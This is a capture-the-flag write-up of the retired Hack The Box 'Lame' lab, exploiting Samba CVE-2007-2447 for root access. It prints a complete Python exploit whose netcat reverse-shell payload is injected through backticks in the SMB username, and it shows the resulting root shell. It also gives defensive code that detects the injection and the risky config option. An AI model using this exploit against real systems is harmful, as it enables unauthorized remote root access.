Today we are going to solve another CTF challenge, “Lame”, a lab presented by Hack The Box for practising online penetration testing according to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB has two partitions of labs, i.e. Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Lame lab.
Level: Beginner
Task: find user.txt and root.txt file in victim’s machine.
Let’s begin the Game!!
Since these labs are available online, they have static IPs; the IP of Lame is 10.10.10.3, so let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sV 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:00 W. Europe Standard Time
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds
root@kali:/pwk# nmap --script smb-os-discovery.nse -p445 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 07:57 EDT
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-17T04:59:42-04:00

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds
From the nmap results we see that Samba smbd 3.x is running on the victim’s machine (the smb-os-discovery script reports it more precisely as Samba 3.0.20-Debian).
CVE-2007-2447 – Samba usermap script. Samba 3.0.20 through 3.0.25rc3 with the “username map script” option configured passes the client-supplied username to a shell without sanitising it, so a username containing backtick command substitution gets executed by the server.
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Usage:
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
RHOST — The target address
RPORT — The target port (TCP: 139)
LHOST — The listen address
LPORT — The listen port
Installation
sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
└──╼ $python usermap_script.py 10.10.10.3 445 10.10.14.10 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
root@kali:~/htb/lame# cat usermap.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection


def exploit(rhost, rport, lhost, lport):
    # Reverse shell command that the vulnerable "username map script" will run.
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    # The username is handed to the map script unsanitised, so the backticks execute.
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except:
        # The session never authenticates; the timeout/error is expected.
        print('[+] Payload was sent - check netcat !')


if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
Done. You should receive the connection to your listener:
root@kali:~/htb/lame# nc -lvp 443
listening on [any] 443 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.3] 52321
whoami
root
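As an added defender-side example (not part of this write-up or of the exploit repository), the following Python flags SMB authentication usernames that carry shell metacharacters, the pattern CVE-2007-2447 relies on, and checks whether an smb.conf enables the “username map script” option; the log excerpt and config fragment are constructed samples.

```python
import re

# Constructed Samba log excerpt (not from the target); the second attempt
# carries backtick command substitution in the username.
SAMPLE_LOG = """\
[2019/08/20 07:57:01,  2] auth/auth.c:319(check_ntlm_password)
  check_ntlm_password:  Authentication for user [makis] -> [makis] FAILED
[2019/08/20 07:58:12,  2] auth/auth.c:319(check_ntlm_password)
  check_ntlm_password:  Authentication for user [/=`nohup id`] -> [/=`nohup id`] FAILED
"""

# Constructed smb.conf fragment with the option that makes CVE-2007-2447 reachable.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; map unknown users before authentication
   username map script = /etc/samba/scripts/mapusers.sh
"""

# Shell metacharacters that never belong in a legitimate account name.
SHELL_META = re.compile(r'[`$;|&<>()]')
USER_FIELD = re.compile(r'Authentication for user \[(.*?)\] ->')


def is_usermap_injection(username):
    """True when the username could reach a shell via 'username map script'."""
    return SHELL_META.search(username) is not None


def find_suspicious_users(log_text):
    """Return the usernames from Samba auth log lines that look like injection."""
    hits = []
    for line in log_text.splitlines():
        match = USER_FIELD.search(line)
        if match and is_usermap_injection(match.group(1)):
            hits.append(match.group(1))
    return hits


def username_map_script_enabled(conf_text):
    """True if an smb.conf sets 'username map script' (case/whitespace tolerant)."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;' or '=' not in line:
            continue
        key, value = line.split('=', 1)
        if ' '.join(key.split()).lower() == 'username map script' and value.strip():
            return True
    return False
```

Run `find_suspicious_users(SAMPLE_LOG)` on real `log.smbd` output with `log level = 2` or higher, and `username_map_script_enabled()` against `/etc/samba/smb.conf`, to spot both the trigger and the exposure.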
Inside the path /home/makis I found the user.txt file.
Inside the path /root I found the root.txt file.
Author: Jacco Straathof